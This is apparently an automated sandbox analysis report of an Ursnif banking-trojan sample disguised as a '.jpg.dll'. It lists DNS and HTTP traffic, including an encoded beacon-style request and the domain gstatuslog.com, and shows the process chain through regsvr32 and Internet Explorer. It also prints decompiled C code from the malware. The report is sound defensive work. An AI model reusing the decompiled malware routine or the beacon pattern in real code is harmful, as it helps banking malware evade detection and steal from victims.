                                                                                                                                                                                                  Jan 22, 2021 10:16:41.571748972 CET8.8.8.8192.168.2.50xf42dNo error (0)cvision.media.netcvision.media.net.edgekey.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                  Jan 22, 2021 10:16:41.917887926 CET8.8.8.8192.168.2.50xbfb0No error (0)srtb.msn.comwww.msn.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                  Jan 22, 2021 10:16:41.917887926 CET8.8.8.8192.168.2.50xbfb0No error (0)www.msn.comwww-msn-com.a-0003.a-msedge.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                  Jan 22, 2021 10:16:43.240962029 CET8.8.8.8192.168.2.50x75beNo error (0)img.img-taboola.comtls13.taboola.map.fastly.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                  Jan 22, 2021 10:16:43.240962029 CET8.8.8.8192.168.2.50x75beNo error (0)tls13.taboola.map.fastly.net151.101.1.44A (IP address)IN (0x0001)
                                                                                                                                                                                                  Jan 22, 2021 10:16:43.240962029 CET8.8.8.8192.168.2.50x75beNo error (0)tls13.taboola.map.fastly.net151.101.65.44A (IP address)IN (0x0001)
                                                                                                                                                                                                  Jan 22, 2021 10:16:43.240962029 CET8.8.8.8192.168.2.50x75beNo error (0)tls13.taboola.map.fastly.net151.101.129.44A (IP address)IN (0x0001)
                                                                                                                                                                                                  Jan 22, 2021 10:16:43.240962029 CET8.8.8.8192.168.2.50x75beNo error (0)tls13.taboola.map.fastly.net151.101.193.44A (IP address)IN (0x0001)
                                                                                                                                                                                                  Jan 22, 2021 10:17:26.094314098 CET8.8.8.8192.168.2.50xd66cNo error (0)ocsp.sca1b.amazontrust.com13.224.195.167A (IP address)IN (0x0001)
                                                                                                                                                                                                  Jan 22, 2021 10:17:26.094314098 CET8.8.8.8192.168.2.50xd66cNo error (0)ocsp.sca1b.amazontrust.com13.224.195.149A (IP address)IN (0x0001)
                                                                                                                                                                                                  Jan 22, 2021 10:17:26.094314098 CET8.8.8.8192.168.2.50xd66cNo error (0)ocsp.sca1b.amazontrust.com13.224.195.228A (IP address)IN (0x0001)
                                                                                                                                                                                                  Jan 22, 2021 10:17:26.094314098 CET8.8.8.8192.168.2.50xd66cNo error (0)ocsp.sca1b.amazontrust.com13.224.195.13A (IP address)IN (0x0001)
                                                                                                                                                                                                  Jan 22, 2021 10:19:50.571101904 CET8.8.8.8192.168.2.50x74d7No error (0)gstatuslog.com141.136.42.30A (IP address)IN (0x0001)
                                                                                                                                                                                                  Jan 22, 2021 10:19:50.571101904 CET8.8.8.8192.168.2.50x74d7No error (0)gstatuslog.com2.57.184.16A (IP address)IN (0x0001)

                                                                                                                                                                                                  HTTP Request Dependency Graph

                                                                                                                                                                                                  • ocsp.sca1b.amazontrust.com

                                                                                                                                                                                                  HTTP Packets

                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                  0192.168.2.54976713.224.195.16780C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                                                                  Jan 22, 2021 10:17:26.150515079 CET4406OUTGET /images/pWO7gR1H/D7HcuyFwtqQyc2f7q30Sd_2/FpvO8g9Yt5/2sg_2BRDopkySLofc/dkvmiGq3mHQj/9cyQdhK_2B9/azaTrmORrQeoXS/bACWS0fxUaX55PQ_2Fz1L/SGv7j6lLaBvkjGGO/vKK54z_2Boqw2T6/kG6Y8SdQIYEyKDgkqr/xQr9PXAUv/_2FGBrMyPIWHK67_2Btq/cGu_2BgqH_2BAaZKhVo/ScaI1GsuG5Cl_2/FdCVaSy.avi HTTP/1.1
                                                                                                                                                                                                  Accept: text/html, application/xhtml+xml, image/jxr, */*
                                                                                                                                                                                                  Accept-Language: en-US
                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                                                                                                  Host: ocsp.sca1b.amazontrust.com
                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                  Jan 22, 2021 10:17:26.241319895 CET4407INHTTP/1.1 200 OK
                                                                                                                                                                                                  Content-Type: application/ocsp-response
                                                                                                                                                                                                  Content-Length: 5
                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                                  Cache-Control: public, max-age=300
                                                                                                                                                                                                  Date: Fri, 22 Jan 2021 09:17:26 GMT
                                                                                                                                                                                                  ETag: "5f4e9b04-5"
                                                                                                                                                                                                  Last-Modified: Tue, 01 Sep 2020 19:03:32 GMT
                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                  X-Cache: Miss from cloudfront
                                                                                                                                                                                                  Via: 1.1 430fc75cac3bdd04869a39405c45fba2.cloudfront.net (CloudFront)
                                                                                                                                                                                                  X-Amz-Cf-Pop: FRA2-C1
                                                                                                                                                                                                  X-Amz-Cf-Id: WQin36HXbWn81T80VprvyU7fiZEqr6IS9FcuTfJaA5YfD9w22dCZpQ==
                                                                                                                                                                                                  Data Raw: 30 03 0a 01 06
                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                  HTTPS Packets

                                                                                                                                                                                                  TimestampSource IPSource PortDest IPDest PortSubjectIssuerNot BeforeNot AfterJA3 SSL Client FingerprintJA3 SSL Client Digest
                                                                                                                                                                                                  Jan 22, 2021 10:16:43.361674070 CET151.101.1.44443192.168.2.549749CN=*.taboola.com, O="Taboola, Inc", L=New York, ST=New York, C=US CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=USCN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=US CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=USWed Nov 25 01:00:00 CET 2020 Thu Sep 24 02:00:00 CEST 2020Mon Dec 27 00:59:59 CET 2021 Tue Sep 24 01:59:59 CEST 2030771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,09e10692f1b7f78228b2d4e424db3a98c
                                                                                                                                                                                                  CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=USCN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=USThu Sep 24 02:00:00 CEST 2020Tue Sep 24 01:59:59 CEST 2030
                                                                                                                                                                                                  Jan 22, 2021 10:16:43.362297058 CET151.101.1.44443192.168.2.549748CN=*.taboola.com, O="Taboola, Inc", L=New York, ST=New York, C=US CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=USCN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=US CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=USWed Nov 25 01:00:00 CET 2020 Thu Sep 24 02:00:00 CEST 2020Mon Dec 27 00:59:59 CET 2021 Tue Sep 24 01:59:59 CEST 2030771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,09e10692f1b7f78228b2d4e424db3a98c
                                                                                                                                                                                                  CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=USCN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=USThu Sep 24 02:00:00 CEST 2020Tue Sep 24 01:59:59 CEST 2030
                                                                                                                                                                                                  Jan 22, 2021 10:16:43.362451077 CET151.101.1.44443192.168.2.549747CN=*.taboola.com, O="Taboola, Inc", L=New York, ST=New York, C=US CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=USCN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=US CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=USWed Nov 25 01:00:00 CET 2020 Thu Sep 24 02:00:00 CEST 2020Mon Dec 27 00:59:59 CET 2021 Tue Sep 24 01:59:59 CEST 2030771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,09e10692f1b7f78228b2d4e424db3a98c
                                                                                                                                                                                                  CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=USCN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=USThu Sep 24 02:00:00 CEST 2020Tue Sep 24 01:59:59 CEST 2030
                                                                                                                                                                                                  Jan 22, 2021 10:16:43.362951040 CET151.101.1.44443192.168.2.549744CN=*.taboola.com, O="Taboola, Inc", L=New York, ST=New York, C=US CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=USCN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=US CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=USWed Nov 25 01:00:00 CET 2020 Thu Sep 24 02:00:00 CEST 2020Mon Dec 27 00:59:59 CET 2021 Tue Sep 24 01:59:59 CEST 2030771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,09e10692f1b7f78228b2d4e424db3a98c
                                                                                                                                                                                                  CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=USCN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=USThu Sep 24 02:00:00 CEST 2020Tue Sep 24 01:59:59 CEST 2030
                                                                                                                                                                                                  Jan 22, 2021 10:16:43.385356903 CET151.101.1.44443192.168.2.549745CN=*.taboola.com, O="Taboola, Inc", L=New York, ST=New York, C=US CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=USCN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=US CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=USWed Nov 25 01:00:00 CET 2020 Thu Sep 24 02:00:00 CEST 2020Mon Dec 27 00:59:59 CET 2021 Tue Sep 24 01:59:59 CEST 2030771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,09e10692f1b7f78228b2d4e424db3a98c
                                                                                                                                                                                                  CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=USCN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=USThu Sep 24 02:00:00 CEST 2020Tue Sep 24 01:59:59 CEST 2030
                                                                                                                                                                                                  Jan 22, 2021 10:16:43.385700941 CET151.101.1.44443192.168.2.549746CN=*.taboola.com, O="Taboola, Inc", L=New York, ST=New York, C=US CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=USCN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=US CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=USWed Nov 25 01:00:00 CET 2020 Thu Sep 24 02:00:00 CEST 2020Mon Dec 27 00:59:59 CET 2021 Tue Sep 24 01:59:59 CEST 2030771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,09e10692f1b7f78228b2d4e424db3a98c
                                                                                                                                                                                                  CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=USCN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=USThu Sep 24 02:00:00 CEST 2020Tue Sep 24 01:59:59 CEST 2030

                                                                                                                                                                                                  Code Manipulations

                                                                                                                                                                                                  Statistics

                                                                                                                                                                                                  CPU Usage

                                                                                                                                                                                                  Click to jump to process

                                                                                                                                                                                                  Memory Usage

                                                                                                                                                                                                  Click to jump to process

                                                                                                                                                                                                  High Level Behavior Distribution

                                                                                                                                                                                                  Click to dive into process behavior distribution

                                                                                                                                                                                                  Behavior

                                                                                                                                                                                                  Click to jump to process

                                                                                                                                                                                                  System Behavior

                                                                                                                                                                                                  General

                                                                                                                                                                                                  Start time:10:16:32
                                                                                                                                                                                                  Start date:22/01/2021
                                                                                                                                                                                                  Path:C:\Windows\System32\loaddll32.exe
                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                  Commandline:loaddll32.exe 'C:\Users\user\Desktop\pan0ramic0.jpg.dll'
                                                                                                                                                                                                  Imagebase:0x1080000
                                                                                                                                                                                                  File size:120832 bytes
                                                                                                                                                                                                  MD5 hash:2D39D4DFDE8F7151723794029AB8A034
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Reputation:moderate

                                                                                                                                                                                                  General

                                                                                                                                                                                                  Start time:10:16:33
                                                                                                                                                                                                  Start date:22/01/2021
                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\regsvr32.exe
                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                  Commandline:regsvr32.exe /s C:\Users\user\Desktop\pan0ramic0.jpg.dll
                                                                                                                                                                                                  Imagebase:0x10000
                                                                                                                                                                                                  File size:20992 bytes
                                                                                                                                                                                                  MD5 hash:426E7499F6A7346F0410DEAD0805586B
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Yara matches:
                                                                                                                                                                                                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000003.298876856.0000000005928000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                                                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000003.298930970.0000000005928000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                                                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000003.298914793.0000000005928000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                                                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000002.628060995.0000000005928000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                                                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000003.298824563.0000000005928000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                                                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000003.298690231.0000000005928000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                                                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000003.298657792.0000000005928000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                                                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000003.298734803.0000000005928000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                                                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000003.298607542.0000000005928000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                                                  Reputation:high

                                                                                                                                                                                                  General

                                                                                                                                                                                                  Start time:10:16:33
                                                                                                                                                                                                  Start date:22/01/2021
                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                  Commandline:C:\Windows\system32\cmd.exe /c 'C:\Program Files\Internet Explorer\iexplore.exe'
                                                                                                                                                                                                  Imagebase:0x150000
                                                                                                                                                                                                  File size:232960 bytes
                                                                                                                                                                                                  MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Reputation:high

                                                                                                                                                                                                  General

                                                                                                                                                                                                  Start time:10:16:33
                                                                                                                                                                                                  Start date:22/01/2021
                                                                                                                                                                                                  Path:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                  Commandline:C:\Program Files\Internet Explorer\iexplore.exe
                                                                                                                                                                                                  Imagebase:0x7ff760a90000
                                                                                                                                                                                                  File size:823560 bytes
                                                                                                                                                                                                  MD5 hash:6465CB92B25A7BC1DF8E01D8AC5E7596
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Reputation:high

                                                                                                                                                                                                  General

                                                                                                                                                                                                  Start time:10:16:35
                                                                                                                                                                                                  Start date:22/01/2021
                                                                                                                                                                                                  Path:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                  Commandline:'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6444 CREDAT:17410 /prefetch:2
                                                                                                                                                                                                  Imagebase:0x1030000
                                                                                                                                                                                                  File size:822536 bytes
                                                                                                                                                                                                  MD5 hash:071277CC2E3DF41EEEA8013E2AB58D5A
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Reputation:high

                                                                                                                                                                                                  General

                                                                                                                                                                                                  Start time:10:16:46
                                                                                                                                                                                                  Start date:22/01/2021
                                                                                                                                                                                                  Path:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                  Commandline:'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6444 CREDAT:82962 /prefetch:2
                                                                                                                                                                                                  Imagebase:0x1030000
                                                                                                                                                                                                  File size:822536 bytes
                                                                                                                                                                                                  MD5 hash:071277CC2E3DF41EEEA8013E2AB58D5A
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Reputation:high

                                                                                                                                                                                                  General

                                                                                                                                                                                                  Start time:10:17:24
                                                                                                                                                                                                  Start date:22/01/2021
                                                                                                                                                                                                  Path:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                  Commandline:'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6444 CREDAT:82966 /prefetch:2
                                                                                                                                                                                                  Imagebase:0x1030000
                                                                                                                                                                                                  File size:822536 bytes
                                                                                                                                                                                                  MD5 hash:071277CC2E3DF41EEEA8013E2AB58D5A
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Reputation:high

                                                                                                                                                                                                  Disassembly

                                                                                                                                                                                                  Code Analysis

                                                                                                                                                                                                  Reset < >

                                                                                                                                                                                                    Executed Functions

                                                                                                                                                                                                    C-Code - Quality: 93%
                                                                                                                                                                                                    			E04F6523C(signed char* __eax, intOrPtr* _a4) {
                                                                                                                                                                                                    				signed int _v12;
                                                                                                                                                                                                    				void* _v16;
                                                                                                                                                                                                    				CHAR* _v20;
                                                                                                                                                                                                    				struct _FILETIME _v28;
                                                                                                                                                                                                    				void* _v32;
                                                                                                                                                                                                    				void* _v36;
                                                                                                                                                                                                    				char* _v40;
                                                                                                                                                                                                    				signed int _v44;
                                                                                                                                                                                                    				long _v344;
                                                                                                                                                                                                    				struct _WIN32_FIND_DATAA _v368;
                                                                                                                                                                                                    				signed int _t72;
                                                                                                                                                                                                    				void* _t74;
                                                                                                                                                                                                    				signed int _t76;
                                                                                                                                                                                                    				void* _t78;
                                                                                                                                                                                                    				intOrPtr _t81;
                                                                                                                                                                                                    				CHAR* _t83;
                                                                                                                                                                                                    				void* _t85;
                                                                                                                                                                                                    				signed char _t89;
                                                                                                                                                                                                    				signed char _t91;
                                                                                                                                                                                                    				intOrPtr _t93;
                                                                                                                                                                                                    				void* _t96;
                                                                                                                                                                                                    				long _t99;
                                                                                                                                                                                                    				int _t101;
                                                                                                                                                                                                    				signed int _t109;
                                                                                                                                                                                                    				char* _t111;
                                                                                                                                                                                                    				void* _t113;
                                                                                                                                                                                                    				int _t119;
                                                                                                                                                                                                    				char _t128;
                                                                                                                                                                                                    				void* _t134;
                                                                                                                                                                                                    				signed int _t136;
                                                                                                                                                                                                    				char* _t139;
                                                                                                                                                                                                    				signed int _t140;
                                                                                                                                                                                                    				char* _t141;
                                                                                                                                                                                                    				char* _t146;
                                                                                                                                                                                                    				signed char* _t148;
                                                                                                                                                                                                    				int _t151;
                                                                                                                                                                                                    				void* _t152;
                                                                                                                                                                                                    				void* _t153;
                                                                                                                                                                                                    				void* _t154;
                                                                                                                                                                                                    				void* _t165;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_v12 = _v12 & 0x00000000;
                                                                                                                                                                                                    				_t148 = __eax;
                                                                                                                                                                                                    				_t72 =  *0x4f6d2a0; // 0x63699bc3
                                                                                                                                                                                                    				_t74 = RtlAllocateHeap( *0x4f6d238, 0, _t72 ^ 0x63699ac7);
                                                                                                                                                                                                    				_v20 = _t74;
                                                                                                                                                                                                    				if(_t74 == 0) {
                                                                                                                                                                                                    					L36:
                                                                                                                                                                                                    					return _v12;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				_t76 =  *0x4f6d2a0; // 0x63699bc3
                                                                                                                                                                                                    				_t78 = RtlAllocateHeap( *0x4f6d238, 0, _t76 ^ 0x63699bce);
                                                                                                                                                                                                    				_t146 = 0;
                                                                                                                                                                                                    				_v36 = _t78;
                                                                                                                                                                                                    				if(_t78 == 0) {
                                                                                                                                                                                                    					L35:
                                                                                                                                                                                                    					HeapFree( *0x4f6d238, _t146, _v20);
                                                                                                                                                                                                    					goto L36;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				_t136 =  *0x4f6d2a0; // 0x63699bc3
                                                                                                                                                                                                    				memset(_t78, 0, _t136 ^ 0x63699bce);
                                                                                                                                                                                                    				_t81 =  *0x4f6d2a4; // 0x9ba5a8
                                                                                                                                                                                                    				_t154 = _t153 + 0xc;
                                                                                                                                                                                                    				_t5 = _t81 + 0x4f6e7f2; // 0x73797325
                                                                                                                                                                                                    				_t83 = E04F627B6(_t5);
                                                                                                                                                                                                    				_v20 = _t83;
                                                                                                                                                                                                    				if(_t83 == 0) {
                                                                                                                                                                                                    					L34:
                                                                                                                                                                                                    					HeapFree( *0x4f6d238, _t146, _v36);
                                                                                                                                                                                                    					goto L35;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				_t134 = 0xffffffffffffffff;
                                                                                                                                                                                                    				_v28.dwLowDateTime = 0x63699bce;
                                                                                                                                                                                                    				_v28.dwHighDateTime = 0x63699bce;
                                                                                                                                                                                                    				_t85 = CreateFileA(_t83, 0x80000000, 1, 0, 3, 0x80, 0); // executed
                                                                                                                                                                                                    				_v32 = _t85;
                                                                                                                                                                                                    				if(_t85 != 0x63699bce) {
                                                                                                                                                                                                    					GetFileTime(_t85,  &_v28, 0, 0);
                                                                                                                                                                                                    					_v28.dwLowDateTime = _v28.dwLowDateTime + 0x2a69c000;
                                                                                                                                                                                                    					asm("adc dword [ebp-0x14], 0xc9"); // executed
                                                                                                                                                                                                    					FindCloseChangeNotification(_v32); // executed
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				 *(StrRChrA(_v20, _t146, 0x5c)) = 0;
                                                                                                                                                                                                    				_t89 = 0x3c6ef35f +  *_t148 * 0x19660d;
                                                                                                                                                                                                    				_t91 = 0x3c6ef35f + _t89 * 0x19660d;
                                                                                                                                                                                                    				 *_t148 = _t91;
                                                                                                                                                                                                    				_v32 = _t91 & 0x000000ff;
                                                                                                                                                                                                    				_t93 =  *0x4f6d2a4; // 0x9ba5a8
                                                                                                                                                                                                    				_t16 = _t93 + 0x4f6e813; // 0x642e2a5c
                                                                                                                                                                                                    				_v40 = _t146;
                                                                                                                                                                                                    				_v44 = _t89 & 0x000000ff;
                                                                                                                                                                                                    				__imp__(_v20, _t16);
                                                                                                                                                                                                    				_t96 = FindFirstFileA(_v20,  &_v368); // executed
                                                                                                                                                                                                    				_v16 = _t96;
                                                                                                                                                                                                    				if(_t96 == _t134) {
                                                                                                                                                                                                    					_t146 = 0;
                                                                                                                                                                                                    					goto L34;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				_t99 = CompareFileTime( &(_v368.ftLastWriteTime),  &_v28);
                                                                                                                                                                                                    				while(_t99 > 0) {
                                                                                                                                                                                                    					_t101 = FindNextFileA(_v16,  &_v368); // executed
                                                                                                                                                                                                    					if(_t101 == 0) {
                                                                                                                                                                                                    						FindClose(_v16);
                                                                                                                                                                                                    						_v16 = FindFirstFileA(_v20,  &_v368);
                                                                                                                                                                                                    						_v28.dwHighDateTime = _v344;
                                                                                                                                                                                                    						_v28.dwLowDateTime = _v368.ftLastWriteTime.dwLowDateTime;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					_t99 = CompareFileTime( &(_v368.ftLastWriteTime),  &_v28);
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				_v12 = _v12 & 0x00000000;
                                                                                                                                                                                                    				while(1) {
                                                                                                                                                                                                    					_t109 = _v44;
                                                                                                                                                                                                    					if(_v12 <= _t109) {
                                                                                                                                                                                                    						goto L15;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					_t140 = _v12;
                                                                                                                                                                                                    					if(_t140 > _v32) {
                                                                                                                                                                                                    						_t141 = _v36;
                                                                                                                                                                                                    						 *_a4 = _t141;
                                                                                                                                                                                                    						while(1) {
                                                                                                                                                                                                    							_t128 =  *_t141;
                                                                                                                                                                                                    							if(_t128 == 0) {
                                                                                                                                                                                                    								break;
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    							if(_t128 < 0x30) {
                                                                                                                                                                                                    								 *_t141 = _t128 + 0x20;
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    							_t141 = _t141 + 1;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						_v12 = 1;
                                                                                                                                                                                                    						FindClose(_v16); // executed
                                                                                                                                                                                                    						_t146 = 0;
                                                                                                                                                                                                    						goto L35;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					_t165 = _t140 - _t109;
                                                                                                                                                                                                    					L15:
                                                                                                                                                                                                    					if(_t165 == 0 || _v12 == _v32) {
                                                                                                                                                                                                    						_t111 = StrChrA( &(_v368.cFileName), 0x2e);
                                                                                                                                                                                                    						_t139 = _v40;
                                                                                                                                                                                                    						_t151 = _t111 -  &(_v368.cFileName);
                                                                                                                                                                                                    						_t113 = 0;
                                                                                                                                                                                                    						if(_t139 != 0) {
                                                                                                                                                                                                    							_t48 = _t151 - 4; // -4
                                                                                                                                                                                                    							_t113 = _t48;
                                                                                                                                                                                                    							if(_t113 > _t151) {
                                                                                                                                                                                                    								_t113 = 0;
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						if(_t151 > 4) {
                                                                                                                                                                                                    							_t151 = 4;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						memcpy(_v36 + _t139, _t152 + _t113 - 0x140, _t151);
                                                                                                                                                                                                    						_t154 = _t154 + 0xc;
                                                                                                                                                                                                    						_v40 =  &(_v40[_t151]);
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					do {
                                                                                                                                                                                                    						_t119 = FindNextFileA(_v16,  &_v368); // executed
                                                                                                                                                                                                    						if(_t119 == 0) {
                                                                                                                                                                                                    							FindClose(_v16);
                                                                                                                                                                                                    							_v16 = FindFirstFileA(_v20,  &_v368);
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    					} while (CompareFileTime( &(_v368.ftLastWriteTime),  &_v28) > 0);
                                                                                                                                                                                                    					_v12 = _v12 + 1;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    			}











































                                                                                                                                                                                                    0x04f65245
                                                                                                                                                                                                    0x04f6524b
                                                                                                                                                                                                    0x04f6524d
                                                                                                                                                                                                    0x04f65267
                                                                                                                                                                                                    0x04f65269
                                                                                                                                                                                                    0x04f6526e
                                                                                                                                                                                                    0x04f654e3
                                                                                                                                                                                                    0x04f654ea
                                                                                                                                                                                                    0x04f654ea
                                                                                                                                                                                                    0x04f65274
                                                                                                                                                                                                    0x04f65289
                                                                                                                                                                                                    0x04f6528b
                                                                                                                                                                                                    0x04f6528d
                                                                                                                                                                                                    0x04f65292
                                                                                                                                                                                                    0x04f654d3
                                                                                                                                                                                                    0x04f654dd
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x04f654dd
                                                                                                                                                                                                    0x04f65298
                                                                                                                                                                                                    0x04f652a3
                                                                                                                                                                                                    0x04f652a8
                                                                                                                                                                                                    0x04f652ad
                                                                                                                                                                                                    0x04f652b0
                                                                                                                                                                                                    0x04f652b7
                                                                                                                                                                                                    0x04f652bc
                                                                                                                                                                                                    0x04f652c1
                                                                                                                                                                                                    0x04f654c3
                                                                                                                                                                                                    0x04f654cd
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x04f654cd
                                                                                                                                                                                                    0x04f652d7
                                                                                                                                                                                                    0x04f652db
                                                                                                                                                                                                    0x04f652de
                                                                                                                                                                                                    0x04f652e1
                                                                                                                                                                                                    0x04f652e7
                                                                                                                                                                                                    0x04f652ec
